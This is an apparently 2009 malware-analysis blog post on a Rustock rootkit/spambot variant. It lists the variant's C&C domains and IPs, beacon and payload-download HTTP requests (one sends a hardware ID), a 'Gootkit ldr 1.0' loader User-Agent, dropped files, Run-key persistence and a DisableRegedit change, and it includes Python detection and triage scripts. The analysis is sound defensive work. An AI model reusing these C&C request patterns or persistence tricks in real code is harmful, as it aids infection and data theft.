Rustock is back again more active than ever!
Recently Steve received some new .EXE files classified as Rootkit.Rustock, and we analyzed one of them to see whether the beast Rustock is still active. The bad news is that the results of this analysis show that Rustock's spam activity is still very much alive…
During the analysis we noticed that the malware used a particular User-Agent string to communicate with a specific domain: Gootkit ldr 1.0 … is this the name of a new malware kit???
After execution, the .EXE file injected code into services.exe and then sent several GET requests to a specific domain:
195.2.253.246 (catjepzcft.com)
Network traffic:
GET /progs/ptpqq/pmzznaann.php?adv=advxxx HTTP/1.1
Host: catjepzcft.com

GET /progs/ptpqq/mmjjwjxt.php HTTP/1.1
Host: catjepzcft.com

GET /progs/ptpqq/ebbxlllly.php HTTP/1.1
Host: catjepzcft.com

GET /progs/ptpqq/spcmmzmnak.php HTTP/1.1
Host: catjepzcft.com
All of the above *.php files redirect to PE (Portable Executable) files, which are downloaded into the TEMP folder and then executed hidden (with no visible window).
Rustock spam bots have their C&C (Command and Control) domain names hardcoded inside the malware code; because the domains are resolved at runtime, this technique lets the bot's authors change the hosts behind them dynamically. This Rustock variant started several requests towards these domains:
yopilazankaza.net
grezasadaf.info
mail.grezasadaf.info
Next, we noticed that the malware sent some encrypted traffic to this IP:
74.52.83.83 (user.happyhost.org)
We can see from the traffic below that the malware sent some information to the malicious domain, including our Hardware ID, which identifies our computer:
GET /progs/ptpqq/pmmmaana.php?adv=advxxx&code1=LSI0&code2=0809&id=-[HD_ID]&p=1 HTTP/1.1
Host: catjepzcft.com
Next, it started traffic with another domain:
ctfmon.info
110.60.233.72.static.reverse.ltdomains.com
72.233.60.110
Network traffic:
GET /cd/cd.php?id=5V9B6019C6A1FA0&ver=nz0 HTTP/1.1
Host: ctfmon.info
At this point, the malware started to send data to a new IP:
92.62.101.27 (ds27.esthost.eu)
Network traffic:
GET /d3n2829230.dat HTTP/1.0
User-Agent: Gootkit ldr 1.0
Host: 92.62.101.27:5191
Note how the User-Agent is named: Gootkit ldr 1.0.
It may be the name of a NEW malware kit, and "ldr" most likely stands for loader.
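The two network indicators described above (the /progs/.../*.php beacon carrying the hardware ID, and the "Gootkit ldr 1.0" User-Agent sent to a raw IP on a non-standard port) can be matched on raw HTTP requests from a proxy log or packet capture. The following is an added example written for this article, not code from the original analysis; the sample requests are constructed from the traffic shown above, with the hardware ID replaced by a placeholder.

```python
import re

# Constructed sample requests modelled on the traffic shown in the analysis
# (not a real capture); the hardware ID is replaced by a placeholder.
SAMPLE_REQUESTS = [
    "GET /progs/ptpqq/pmmmaana.php?adv=advxxx&code1=LSI0&code2=0809&id=-HWID_PLACEHOLDER&p=1 HTTP/1.1\r\n"
    "Host: catjepzcft.com\r\n\r\n",
    "GET /d3n2829230.dat HTTP/1.0\r\n"
    "User-Agent: Gootkit ldr 1.0\r\n"
    "Host: 92.62.101.27:5191\r\n\r\n",
    "GET /index.html HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Host: example.com\r\n\r\n",
]

# The loader's User-Agent string observed in this analysis.
UA_RE = re.compile(r"^gootkit ldr\b", re.IGNORECASE)
# /progs/<dir>/<name>.php?...adv=... as in the first-stage requests above.
LOADER_PATH_RE = re.compile(r"^/progs/[^/]+/[^/?]+\.php\?.*\badv=", re.IGNORECASE)
# Host header that is a bare IPv4 address with an explicit port.
RAW_IP_PORT_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}:(\d+)")

def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers); header names are lowercased."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers

def classify(raw):
    """Return the list of reasons a request matches the patterns seen in this variant."""
    method, path, headers = parse_request(raw)
    reasons = []
    if UA_RE.match(headers.get("user-agent", "")):
        reasons.append("user-agent:gootkit-loader")
    if method == "GET" and LOADER_PATH_RE.match(path):
        reasons.append("path:progs-php-adv")
        if "&id=" in path:  # the beacon that carries the hardware ID
            reasons.append("path:hardware-id-beacon")
    m = RAW_IP_PORT_RE.fullmatch(headers.get("host", ""))
    if m and m.group(1) not in ("80", "443"):
        reasons.append("host:raw-ip-nonstandard-port")
    return reasons

def scan(requests):
    """Return (host, reasons) for every request that triggers at least one rule."""
    hits = []
    for raw in requests:
        reasons = classify(raw)
        if reasons:
            hits.append((parse_request(raw)[2].get("host", ""), reasons))
    return hits
```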
New traffic:
GET /xxxxxxxxxxxxx HTTP/1.1
Host: damqrgldev.net

GET /xxxxxxxxxxxxx HTTP/1.1
Host: damqrgldev.net
The malware downloaded various malicious files (again) into the TEMP folder and executed all of them… At this point, the malware started to send a lot of encrypted data to a host already named above:
92.62.101.27 (ds27.esthost.eu)
Network traffic:
Packets : 505
Data Size : 329.768 Bytes
Total Size : 350.040 Bytes
And now heavy SPAM activity started… the malware sent a large number of domain requests to many mail servers:
Then the spambot began sending a high volume of spam messages… the SPAM campaign is now more active than ever!!!
Now let's see which files were created by this Rustock variant:
C:\WINDOWS\system32\drivers\50cb8405.sys => DRIVER OF THE ROOTKIT
C:\mtoaphpo.exe
C:\lcrywx.exe
C:\shcu.exe
C:\1630016.bat
C:\paohiqlm.exe
C:\-[HARDWARE_ID]
C:\WINDOWS\system32\drivers\lmo08ed.sys => ANOTHER DRIVER OF THE ROOTKIT
C:\DOCUME~1\user\LOCALS~1\Temp\2081034192.exe
C:\DOCUME~1\user\LOCALS~1\Temp\2092050032.exe
C:\hhfls.exe
C:\WINDOWS\system32\dllcache\svchost.exe.new
C:\ntgxbfmx.exe
C:\DOCUME~1\user\LOCALS~1\Temp\h531l.exe
C:\adwitwxa.exe
C:\zmuvmq.bat
C:\xuulbic.exe
C:\WINDOWS\system32\crypts.dll
C:\DOCUME~1\user\LOCALS~1\Temp\csrssc.exe
C:\DOCUME~1\user\LOCALS~1\Temp\rip10.exe
C:\DOCUME~1\user\LOCALS~1\Temp\2.exe
C:\DOCUME~1\user\LOCALS~1\Temp\7hjhffd.bat
C:\Program Files\Common Files\imlhy.dll
C:\DOCUME~1\user\LOCALS~1\Temp\g5i8nvt30.exe
C:\DOCUME~1\user\LOCALS~1\Temp\zbqy6cseo.exe
C:\DOCUME~1\user\LOCALS~1\Temp\yb2dpk.exe
C:\DOCUME~1\user\LOCALS~1\Temp\ksjx1r.exe
C:\DOCUME~1\user\LOCALS~1\Temp\y62pk.exe
C:\DOCUME~1\user\LOCALS~1\Temp\phl7u.exe
C:\DOCUME~1\user\LOCALS~1\Temp\x4l7wf4x.exe
C:\DOCUME~1\user\LOCALS~1\Temp\acs2reslt4.exe
Below are the virus scanner reports for the two rootkit drivers:
Report Generated: 16.3.2009 at 0.25.01 (GMT 1)
File Name: 50cb8405.sys
File Size: 101 KB
MD5 Hash: 3B51541EB5EAE7342A191EF17C8B3D60
SHA1 Hash: 70A7C283EE4DFCE6AF490FB256FF944185238C20
Detection Rate: 3 of 24 (12,5 %)
Status: INFECTED

| Antivirus | Sig version | Engine Version | Result |
|---|---|---|---|
| a-squared | 15/03/2009 | 4.0.0.32 | – |
| Avira AntiVir | 7.1.2.171 | 8.1.2.12 | TR/Rootkit.Gen |
| Avast | 090314-0 | 4.8.1229 | – |
| AVG | 270.11.15/2003 | 8.0.0.0 | – |
| BitDefender | 16/03/2009 | 7.0.0.2555 | Backdoor.Rustock.NFE |
| ClamAV | 15/03/2009 | 0.93.1.0 | – |
| Comodo | 1057 | 3.8 | – |
| Dr.Web | 16/03/2009 | 5.0 | – |
| Ewido | 16/03/2009 | 4.0.0.2 | – |
| F-PROT 6 | 20090315 | 4.4.4.56 | – |
| G DATA | 19.3655 | 2.0.7309.847 | – |
| IkarusT3 | 14/03/2009 | 1001044 | – |
| Kaspersky | 16/03/2009 | 8.0.0.357 | – |
| McAfee | 15/03/2009 | 5.1.0.0 | – |
| Malware Hash Registry | 16/03/2009 | N/A | – |
| NOD32 v3 | 3937 | 3.0.677 | – |
| Norman | 2009/03/13 | 5.92.08 | – |
| Panda | 07/02/2009 | 9.5.1.00 | – |
| QuickHeal | 14 March, 2009 | 10.0 | – |
| Solo Antivirus | 16/03/2009 | 8.0 | – |
| Sophos | 16/03/2009 | 4.32.0 | – |
| TrendMicro | 895(589500) | 1.1-1001 | – |
| VBA32 | 16/03/2009 | 3.12.0.300 | Malware-Cryptor.Win32.General.3 |
| VirusBuster | 10.102.11 | 1.4.3 | – |
Report Generated: 16.3.2009 at 0.26.02 (GMT 1)
File Name: lmo08ed.sys
File Size: 21 KB
MD5 Hash: 1614229CC85D2F0DA1668BEC2AA2966E
SHA1 Hash: F2347ABAD8541540040D69DF6EC7F9104B998C74
Detection Rate: 1 of 24 (4,16 %)
Status: INFECTED

| Antivirus | Sig version | Engine Version | Result |
|---|---|---|---|
| a-squared | 15/03/2009 | 4.0.0.32 | – |
| Avira AntiVir | 7.1.2.171 | 8.1.2.12 | – |
| Avast | 090314-0 | 4.8.1229 | – |
| AVG | 270.11.15/2003 | 8.0.0.0 | – |
| BitDefender | 16/03/2009 | 7.0.0.2555 | – |
| ClamAV | 15/03/2009 | 0.93.1.0 | – |
| Comodo | 1057 | 3.8 | – |
| Dr.Web | 16/03/2009 | 5.0 | – |
| Ewido | 16/03/2009 | 4.0.0.2 | – |
| F-PROT 6 | 20090315 | 4.4.4.56 | – |
| G DATA | 19.3655 | 2.0.7309.847 | – |
| IkarusT3 | 14/03/2009 | 1001044 | – |
| Kaspersky | 16/03/2009 | 8.0.0.357 | – |
| McAfee | 15/03/2009 | 5.1.0.0 | – |
| Malware Hash Registry | 16/03/2009 | N/A | – |
| NOD32 v3 | 3937 | 3.0.677 | – |
| Norman | 2009/03/13 | 5.92.08 | Trojan W32/Rootkit.AJUT |
| Panda | 07/02/2009 | 9.5.1.00 | – |
| QuickHeal | 14 March, 2009 | 10.0 | – |
| Solo Antivirus | 16/03/2009 | 8.0 | – |
| Sophos | 16/03/2009 | 4.32.0 | – |
| TrendMicro | 895(589500) | 1.1-1001 | – |
| VBA32 | 16/03/2009 | 3.12.0.300 | – |
| VirusBuster | 10.102.11 | 1.4.3 | – |
The rootkit always installs the 3 (famous) SSDT hooks, and this time we can see that it also hides its own driver:
Hidden Driver:
Stealth Code:
Kernel Modifications:
And below is a HijackThis log:
Running processes:
C:\DOCUME~1\user\LOCALS~1\Temp\csrssc.exe
C:\DOCUME~1\user\LOCALS~1\Temp\ig2wf5bum4.exe
C:\DOCUME~1\user\LOCALS~1\Temp\i10ftqrh0.exe

O4 – HKLM\..\Run: [xsigsud7qw7f8rwrt8] C:\DOCUME~1\user\LOCALS~1\Temp\h531l.exe
O4 – HKLM\..\Run: [y0agaspmnmxkw4djb3as16eeuar] C:\DOCUME~1\user\LOCALS~1\Temp\g5i8nvt30.exe
O4 – HKLM\..\Run: [t50zoy0kqddd9qjam7lfo] C:\DOCUME~1\user\LOCALS~1\Temp\f35avpt2j.exe
O4 – HKLM\..\Run: [krae4io3anewkh6n1c32] C:\DOCUME~1\user\LOCALS~1\Temp\go82c4irn.exe
O4 – HKLM\..\Run: [i3ommwe1iq63eplz1l5shm39kd3nr] C:\DOCUME~1\user\LOCALS~1\Temp\ldav9bgf.exe
O4 – HKLM\..\Run: [wlad2loiah66phy9e] C:\DOCUME~1\user\LOCALS~1\Temp\s7rg8a.exe
O4 – HKLM\..\Run: [kq005y3gtd5grvxemgyp77puvoxeh] C:\DOCUME~1\user\LOCALS~1\Temp\ceu9gzw17.exe
O4 – HKLM\..\Run: [y2l3ad3xmfd99c18hrirbgvnztg] C:\DOCUME~1\user\LOCALS~1\Temp\zbqy6cseo.exe
O4 – HKLM\..\Run: [ejk9b1onvd75gfmvp2j] C:\DOCUME~1\user\LOCALS~1\Temp\yb2dpk.exe
O4 – HKLM\..\Run: [bicya6fq4l8rm17m0e3tk] C:\DOCUME~1\user\LOCALS~1\Temp\rh1lty.exe
O4 – HKLM\..\Run: [aotn8li6zj2a9a3pd5nk7y] C:\DOCUME~1\user\LOCALS~1\Temp\p27p2.exe
O4 – HKLM\..\Run: [x4veff6kyajo16mhq18ujw8vj3dpa] C:\DOCUME~1\user\LOCALS~1\Temp\ksjx1r.exe
O4 – HKLM\..\Run: [omxf835aubqqpxvzfdvre094g2m0m] C:\DOCUME~1\user\LOCALS~1\Temp\y62pk.exe
O4 – HKLM\..\Run: [eo8in0uixmmd988l5dtstn0gju] C:\DOCUME~1\user\LOCALS~1\Temp\phl7u.exe
O4 – HKLM\..\Run: [e9vetnuspuff604s9iu4bpt] C:\DOCUME~1\user\LOCALS~1\Temp\x4l7wf4x.exe
O4 – HKLM\..\Run: [urg2avbreylonz] C:\DOCUME~1\user\LOCALS~1\Temp\acs2reslt4.exe
O4 – HKCU\..\Run: [nuj56tlag39hly] C:\DOCUME~1\user\LOCALS~1\Temp\d2q8qn.exe
O4 – HKCU\..\Run: [xjtsi4b3oq3] C:\DOCUME~1\user\LOCALS~1\Temp\pyphk.exe
O4 – HKCU\..\Run: [qcsn79k6rirjgr] C:\DOCUME~1\user\LOCALS~1\Temp\l2jna51.exe
O4 – HKCU\..\Run: [oso3bevvdmzr1] C:\DOCUME~1\user\LOCALS~1\Temp\bvtrncc.exe
O4 – HKCU\..\Run: [ubvttqcqfdt7yxo4gt9opxraitvp] C:\DOCUME~1\user\LOCALS~1\Temp\ig2wf5bum4.exe
O4 – HKCU\..\Run: [qiojoeqys7e1f4kgazo4eycu8] C:\DOCUME~1\user\LOCALS~1\Temp\i10ftqrh0.exe
O7 – HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1
O20 – Winlogon Notify: crypt – C:\WINDOWS\SYSTEM32\crypts.dll
The malware also disabled regedit.exe: as we can see from this entry, it set the DWORD value named DisableRegedit to 1:
O7 – HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1
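The persistence artifacts visible in the HijackThis log above (Run keys with random-looking names pointing at executables in the Temp folder, the DisableRegedit policy, and the Winlogon Notify DLL) can be triaged automatically. The following is an added example written for this article, not the original analysis' tooling; the log lines are constructed after the ones shown above, and the random-name heuristic is a deliberately simple assumption.

```python
import re

# Constructed HijackThis-style lines modelled on the log above (not the real log),
# plus one benign Run entry to show that it is not flagged.
SAMPLE_LOG = r"""
O4 - HKLM\..\Run: [xsigsud7qw7f8rwrt8] C:\DOCUME~1\user\LOCALS~1\Temp\h531l.exe
O4 - HKCU\..\Run: [nuj56tlag39hly] C:\DOCUME~1\user\LOCALS~1\Temp\d2q8qn.exe
O4 - HKLM\..\Run: [SoundMan] C:\WINDOWS\SOUNDMAN.EXE
O7 - HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1
O20 - Winlogon Notify: crypt - C:\WINDOWS\SYSTEM32\crypts.dll
"""

# HijackThis writes " - "; extracted copies of logs often carry an en dash instead.
O4_RE = re.compile(r"^O4 [-–] (HKLM|HKCU)\\\.\.\\Run: \[(?P<name>[^\]]+)\] (?P<path>.+)$")
O7_RE = re.compile(r"^O7 [-–] (?P<key>[^,]+), (?P<value>\w+)=(?P<data>\S+)$")
O20_RE = re.compile(r"^O20 [-–] Winlogon Notify: (?P<name>\S+) [-–] (?P<path>.+)$")
TEMP_RE = re.compile(r"\\Temp\\", re.IGNORECASE)

def looks_random(name):
    """Weak heuristic (an assumption of this example): long, digit-bearing name
    with no two adjacent vowels, like the Run value names in the log above."""
    return bool(len(name) >= 12 and re.search(r"\d", name)
                and not re.search(r"[aeiou]{2}", name, re.IGNORECASE))

def triage(log_text):
    """Return (line, reason) findings for the persistence patterns seen in this variant."""
    findings = []
    for line in log_text.splitlines():
        m = O4_RE.match(line)
        if m:
            if TEMP_RE.search(m["path"]):
                findings.append((line, "run-key-exe-in-temp"))
            if looks_random(m["name"]):
                findings.append((line, "run-key-random-name"))
            continue
        m = O7_RE.match(line)
        if m and m["value"].lower() == "disableregedit" and m["data"] == "1":
            findings.append((line, "policy-disables-regedit"))
            continue
        m = O20_RE.match(line)
        if m:
            # Legitimate Winlogon Notify packages are few; every entry is worth a manual look.
            findings.append((line, "winlogon-notify-dll"))
    return findings
```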